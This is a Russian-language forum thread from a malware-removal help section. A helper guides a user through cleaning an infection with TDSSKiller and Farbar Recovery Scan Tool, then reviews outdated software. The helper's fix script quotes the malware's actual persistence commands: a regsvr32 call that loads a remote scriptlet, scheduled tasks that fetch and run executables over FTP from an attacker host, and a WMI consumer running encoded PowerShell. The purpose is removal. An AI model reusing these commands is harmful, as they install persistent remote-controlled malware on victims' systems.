Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 (изменено) После проверки TDSSKiller найденные угрозы можно вылечить или поместить на карантин . На данный момент утилитой TDSSKiller угроз не обнаружено , но в планировщике заданий всё ещё есть процессы mysa и ok. TDSSKiller.3.1.0.28_17.04.2019_22.14.22_log.zip Изменено 17 апреля, 2019 пользователем Матвей Ульченко Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 Теперь сделайте новые логи Farbar Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Сделал всё как было написано выше Desktop.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 1. Выделите следующий код: Start:: CreateRestorePoint: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b559f6d7-8635-47d6-9a51-c16c1d11b00d} <==== ATTENTION (Restriction - IP) CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pmpoaahleccaibbhfjfimigepmfmmbbk] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [icanjjkadceebmhanpekkofdhclnoijl] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\VirusDefs\20160403.034\ENG64.SYS [X] S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\VirusDefs\20160403.034\EX64.SYS [X] 2019-04-17 22:14 - 2019-04-17 22:14 - 000000080 _____ C:\Windows\system32\s 2019-04-17 22:14 - 2019-04-17 22:14 - 000000078 _____ C:\Windows\system32\ps 2019-04-17 22:14 - 2019-04-17 22:14 - 000000076 _____ C:\Windows\system32\p 2019-04-17 20:56 - 2019-04-17 20:56 - 002969600 _____ C:\Windows\system32\ok.exe 2019-04-17 20:56 - 2019-04-17 20:56 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe 2019-04-17 20:56 - 2019-04-17 20:56 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe 2019-04-17 19:55 - 2019-04-17 20:56 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Drivers\64.exe 2019-04-17 17:55 - 2019-04-17 20:56 - 000003518 _____ C:\Windows\System32\Tasks\Mysa 2019-04-17 17:55 - 2019-04-17 20:56 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3 2019-04-17 17:55 - 2019-04-17 20:56 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2 2019-04-17 17:55 - 2019-04-17 20:56 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2019-04-17 17:55 - 2019-04-17 20:56 - 000003186 _____ C:\Windows\System32\Tasks\ok 2019-04-17 17:54 - 2019-04-17 20:56 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe 2019-04-17 17:54 - 2019-04-17 20:56 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat 2019-03-09 21:14 - 2019-04-17 20:57 - 000008644 _____ C:\Windows\system32\c.txt 2019-03-09 21:14 - 2019-03-11 19:17 - 000354488 _____ C:\Windows\system32\a.txt WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION Task: {1F516028-3144-4179-844E-C6C9F55FEA9C} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {748212A3-0611-44A7-B75D-957F1CFE44D1} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {8BD5EF9E-F917-4A60-925F-500F782BAA20} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {C212B0BC-C7BC-400C-85F9-A5ED28E715D0} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Reboot: End:: 2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).3. Запустите Farbar Recovery Scan Tool. 4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Проблема решена , большое спасибо . Fixlog.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10); Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу; Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt; Процитируйте содержимое файла в своем следующем сообщении. Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Извините я не понял последний пункт . Процитируйте содержимое файла в своем следующем сообщении SecurityCheck.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 18 апреля, 2019 Share Опубликовано 18 апреля, 2019 ------------------------------- [ Windows ] -------------------------------Internet Explorer 11.0.9600.18537 Внимание! Скачать обновления ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^ ------------------------------- [ HotFix ] -------------------------------- HotFix KB3125574 Внимание! Скачать обновления HotFix KB4012212 Внимание! Скачать обновления HotFix KB4493472 Внимание! Скачать обновления ---------------------- [ AntiVirusFirewallInstall ] ----------------------- Malwarebytes Anti-Malware, версия 2.2.1.1043 v.2.2.1.1043 Внимание! Скачать обновления -------------------------- [ SecurityUtilities ] -------------------------- Malwarebytes Anti-Malware, версия 2.2.1.1043 v.2.2.1.1043 --------------------------- [ OtherUtilities ] ---------------------------- WinRAR 5.30 (64-разрядная) v.5.30.0 Внимание! Скачать обновления Microsoft .NET Framework 4.6.2 v.4.6.01590 Внимание! Скачать обновления Microsoft Silverlight v.5.1.50709.0 Внимание! Скачать обновления NVIDIA GeForce Experience 3.11.0.73 v.3.11.0.73 Внимание! Скачать обновления --------------------------------- [ IM ] ---------------------------------- Skype™ 7.32 v.7.32.104 Внимание! Скачать обновления -------------------------------- [ Java ] --------------------------------- Java 8 Update 102 (64-bit) v.8.0.1020.14 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u211-windows-x64.exe)^ Java 8 Update 102 v.8.0.1020.14 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u211-windows-i586.exe)^ --------------------------- [ AdobeProduction ] --------------------------- Adobe Shockwave Player 12.2 v.12.2.5.195 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее. ---------------------------- [ UnwantedApps ] ----------------------------- Unity Web Player v.5.3.5f1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. выполните рекомендованное, и на этом закончим. Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 18 мая, 2019 Share Опубликовано 18 мая, 2019 Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить компьютерные технологии, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, фан-клуб "Лаборатории Касперского". Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения